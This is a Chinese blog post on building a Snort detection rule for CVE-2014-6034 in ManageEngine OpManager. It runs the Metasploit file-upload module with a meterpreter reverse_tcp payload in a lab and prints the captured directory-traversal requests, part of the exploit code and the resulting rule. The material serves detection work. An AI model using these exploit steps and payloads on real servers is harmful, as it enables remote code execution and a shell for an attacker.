【网络安全】Snort漏洞分析规则提取验证全流程讲述

本文以CVE 2014-6034为例进行漏洞分析与验证,包括环境搭建抓包,特征提取验证各个环节。

1、下载软件:

ManageEngine OpManager 9

地址:http://manageengine-opmanager.soft32.com/

Kali Linux

https://www.kali.org/downloads/

我下载在是Kali Linux 64 bit ISO 1.0.9a ISO

2、环境搭建

ManageEngine OpManager 9 直接点击安装即可,安装过程中会告诉启动的port默认为8060端口,我们可以通过a.b.c.d:8060来访问此软件。

Kali Linux需要建一个虚拟机,建议用VMware即可,属于deban类型。

Kali Linux安装后需要更新一下系统安装更新,步驟如下:如果不是root用戶必須使用sudo进行相关命令操作。

要求虚拟机和OpManager软件所在的机器为同一网段。

a、更新软件源:

修改sources.list文件:

leafpad /etc/apt/sources.list

然后选择添加以下适合自己较快的源(可自由选择,不一定要全部):

#官方源deb http://http.kali.org/kali kali main non-free contribdeb-src
http://http.kali.org/kali kali main non-free contribdeb

http://security.kali.org/kali-security kali/updates main contrib non-free#激进源,新手不推荐使用这个软件源deb

http://repo.kali.org/kali kali-bleeding-edge maindeb-src
http://repo.kali.org/kali kali-bleeding-edge main#中科大kali源deb

http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb-src
http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb

http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free#阿里云kali源deb
http://mirrors.aliyun.com/kali kali main

non-free contribdeb-src http://mirrors.aliyun.com/kali kali main non-free contribdeb http://mirrors.aliyun.com/kali-security

kali/updates main contrib non-free保存之后运行:

apt-get update      #刷新系统

apt-get dist-upgrade         #安装更新

b、Metasploit Framework设置

依照kali linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内。所以为了让metasploit以支持数据库的方式运行有些必要的步骤

启动Kali的PostgreSQL服务:Metasploit 使用PostgreSQL作为数据库,所以必须先运行它。

service postgresql start

可以用 ss -ant  的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态。

State Recv-Q Send-Q Local Address:Port Peer Address:Port

LISTEN 0 128 :::22 :::*8

LISTEN 0 128 *:22 *:*3

LISTEN 0 128 127.0.0.1:5432 *:*4

LISTEN 0 128 ::1:5432 :::*

启动Kali的Metasploit服务:随着PostgreSQL的启动和运行,接着我们要运行Metasploit服务。第一次运行服务会创建一个msf3数据库用户和一个叫

msf3的数据库。还会运行Metasploit RPC和它需要的WEB 服务端。

service metasploit start

在Kali运行msfconsole:现在PostgreSQL 和 Metasploit服务都运行了,可以运行 msfconsole,然后用 db_status 命令检验数据库的连通性。

msf > db_status

[*] postgresql connected to msf3

msf >

配置Metasploit随系统启动运行:如果你想PostgreSQL和Metasploit在开机时运行,你可以使用update-rc.d启用服务。

update-rc.d postgresql enable

update-rc.d metasploit enable

介绍一下metasploit一些常用命令,search(搜索漏洞利用信息及脚本),use(使用某个模块),show options(显示此模块所必须的选项) set [option]

xx设置选项,exploit(启动利用)

3、验证抓包:

下载漏洞利用脚本,地址http://www.scap.org.cn/CVE-2014-6034.html进入packetstorm下载rb脚本文件,将此文件上传到/usr/share/metasploit-framework/modules/exploits/windows/http目录,重新启动msfconsole后利用search命令搜索opmanager,然后进行设置利用即可。

msf exploit(opmanager_socialit_file_upload) > search opmanage

Matching Modules

================

Name                                                 Disclosure Date  Rank       Description

----                                                 ---------------  ----       -----------

exploit/windows/http/opmanager_socialit_file_upload  2014-09-27       excellent  ManageEngine OpManager / Social IT Arbitrary File Upload

msf exploit(opmanager_socialit_file_upload) > show options

Module options (exploit/windows/http/opmanager_socialit_file_upload):

Name     Current Setting  Required  Description

----     ---------------  --------  -----------

Proxies                   no        Use a proxy chain

RHOST    192.168.83.166   yes       The target address

RPORT    8060             yes       The target port

SLEEP    15               yes       Seconds to sleep while we wait for WAR deployment

VHOST                     no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description

----   ---------------  --------  -----------

LHOST  192.168.83.175   yes       The listen address

LPORT  4444             yes       The listen port

Exploit target:

Id  Name

--  ----

0   OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal

msf exploit(opmanager_socialit_file_upload) > exploit

4、抓取报文内容如下:

第一个包:

POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=Uw71PQDsCqCtUDrcKJhv.war HTTP/1.1

Host: 192.168.83.166:8060

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Content-Type: application/octet-stream

Content-Length: 6469

第二个包:

POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/conf&FILENAME=context.xml HTTP/1.1

Host: 192.168.83.166:8060

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Content-Type: application/xml

Content-Length: 125

<?xml version=‘1.0‘ encoding=‘utf-8‘?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>

由利用脚本可知,第一次不成功是继续探测

def exploit

app_base = rand_text_alphanumeric(4 + rand(32 - 4))

upload_war_and_exec(false, app_base)

register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")

sleep_counter = 0

while not session_created?

if sleep_counter == datastore[‘SLEEP‘]

print_error("#{peer} - Failed to get a shell, let‘s try one more time")

upload_war_and_exec(true, app_base)

return

end

sleep(1)

sleep_counter += 1

end

5、snort特征提取验证

#flow:to_server,established;

alert tcp any any -> any 8060 (msg:"Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.Fil

eCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote att

ackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter."; cont

ent:"com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"; nocase; content:"FILENAME=";nocase;within:45;pcre:"/regionI

D=\.\./\.\./\.\./.*/i";reference:cve,2014-6034; sid:1089;rev:1)

6、执行snort查看告警信息如下:

snort -r ../pkt/2014-6034_kalitowindows_exploit_succ_pkt_jyh_001.pcap -c snort.conf -l log/ -A console

01/08-20:53:18.917122  [**] [1:1089:1] Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows
remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter. [**] [Priority: 0] {TCP} 192.168.83.175:44845 -> 192.168.83.166:8060

时间: 2024-10-12 22:04:45

【网络安全】Snort漏洞分析规则提取验证全流程讲述的相关文章

比葫芦娃还可怕的百度全系APP SDK漏洞 - WormHole虫洞漏洞分析报告 (转载)

瘦蛟舞 · 2015/11/02 10:50 作者:瘦蛟舞,蒸米 ”You can’t have a back door in the software because you can’t have a back door that’s only for the good guys.“ - Apple CEO Tim Cook ”你不应该给软件装后门因为你不能保证这个后门只有好人能够使用.” – 苹果CEO 库克 0x00 序 最早接触网络安全的人一定还记得当年RPC冲击波,WebDav等远程攻

【网络安全】PHP常见漏洞分析

漏洞的形成原因复杂,有程序员编码的问题, 有系统的问题,还有可能是配置环境的问题.这里简单总结一下php的常见漏洞,让大家对网站漏洞有一个简单的认识. 如果想要快速入门,推荐大家可以观看本人精心制作的 PHP网站漏洞挖掘课程: PHP漏洞挖掘(二):PHP常见漏洞分析 0x01 sql注入漏洞 sql注入漏洞,只要是一个懂编程的基本都听说过的,即便你不太了解网络安全,这个漏洞也被大家广泛的知道了,因为它的危害性和影响的深远性. sql注入可以按照接收的元素分为 数字型注入和字符型注入.按照注入的

火力发电厂工控系统网络安全解决方案 - 对比分析

发电厂网络概述 火电厂网络架构中涉及的系统主要包括:火电机组分散控制系统DCS.火电机组辅机控制系统DCS\PLC.火电厂级信息监控系统.调速系统和自动发电控制功能AGC.励磁系统和自动电压控制功能AVC.梯级调度监控系统.网控系统.继电保护.故障录波.电能量采集装置.电力市场报价终端等系统. 电力行业在安全方面是考虑地比较早的,形成了"安全分区.网络专用.横向隔离.纵向认证"的总体原则. 区域一般分为:生产控制大区(控制区+非控制区),管理信息大区. 也有情况下,电厂会将区域分为4个

TCP粘包问题分析和解决(全)

TCP通信粘包问题分析和解决(全) 在socket网络程序中,TCP和UDP分别是面向连接和非面向连接的.因此TCP的socket编程,收发两端(客户端和服务器端)都要有成对的socket,因此,发送端为了将多个发往接收端的包,更有效的发到对方,使用了优化方法(Nagle算法),将多次间隔较小.数据量小的数据,合并成一个大的数据块,然后进行封包.这样,接收端,就难于分辨出来了,必须提供科学的拆包机制. 对于UDP,不会使用块的合并优化算法,这样,实际上目前认为,是由于UDP支持的是一对多的模式,

2015年11月数据安全漏洞分析报告

报告核心观点 1.千帆过尽,SQL注入仍"不改" 2.本月金融业漏洞增长尤为突出 3.11月常见数据泄露原因分析 4.解决弱口令安全建议 报告正文 2015年11月,安华每日安全资讯总结发布了126个数据泄密高危漏洞,这些漏洞分别来自乌云.补天.漏洞盒子等平台,涉及8个行业,公司机构.互联 网.交通运输.教育.金融.能源.运营商.政府.漏洞类型涉及,SQL注入.系统漏洞.弱口令等7类,其中SQL注入仍然是漏洞类型的重灾区. 千帆过尽,SQL注入仍"不改" 数据安全问

Struts2漏洞之S2-016漏洞分析与exp编写

 1.概述 S2-016是13年7月爆出的,那时候的我还没涉及Web安全研究.这次迟到的分析也算是对过去的补充.这个漏洞影响了Struts 2.3.15.1之前的所有版本.问题主要出在对于特殊URL处理中,redirect与redirectAction后面跟上Ognl表达式会被服务器执行. 2.漏洞分析 分析开源框架的漏洞还是从其源码入手,问题出在了DefaultActiionMapper上,这个类主要是用来处理一些灵活的URL调用,比如处理Action中动态调用方法的形式,如: http:

金融行业安全漏洞分析报告

报告介绍 互联网+时代的到来,人们充分享受新时代科技创新成果的便利同时,万物互联带来的信息安全风险也日渐提高,信息泄密事件层出不穷,在资金体量庞大.用户信息集中.安全隐患影响深远的金融领域,所面临的安全问题尤为凸显.人们真切地感知到,原有的金融服务模式被颠覆,网银.第三方支付.互联网金融等新兴模式异军突起.用户也在这些新的业务模式下,将自身姓名.***号码.手机号码等身份认证信息与业务紧密绑定关联.所以说,互联网的发展为传统的信息防御体系划开了一道口子,打破看似牢不可破的安全防护状态,直逼用户核

书评第003篇:《0day安全:软件漏洞分析技术(第2版)》

本书基本信息 丛书名:安全技术大系 作者:王清(主编),张东辉.周浩.王继刚.赵双(编著) 出版社:电子工业出版社 出版时间:2011-6-1 ISBN:9787121133961 版次:1 页数:753 字数:780000 印刷时间:2011-6-1 开本:16开 纸张:胶版纸 印次:1 包装:平装 书籍封面 内容简介 本书分为5篇33章,系统.全面地介绍了Windows平台缓冲区溢出漏洞的分析.检测与防护.第一篇为漏洞exploit的基础理论和初级技术,可以引领读者迅速入门:第二篇在第一篇的

【转载】网络安全---Strurts2漏洞介绍

Apache Struts2 作为世界上最流行的 Java Web 服务器框架之一,3 月 7 日带来了本年度第一个高危漏洞--CVE编号 CVE-2017-5638 .其原因是由于 Apache Struts2 的 Jakarta Multipart parser 插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改 HTTP 请求头中的 Content-Type 值来触发该漏洞,导致远程执行代码. 哪些网站已中招 Struts 作为一个"世界级"开源架构,它的一个高危漏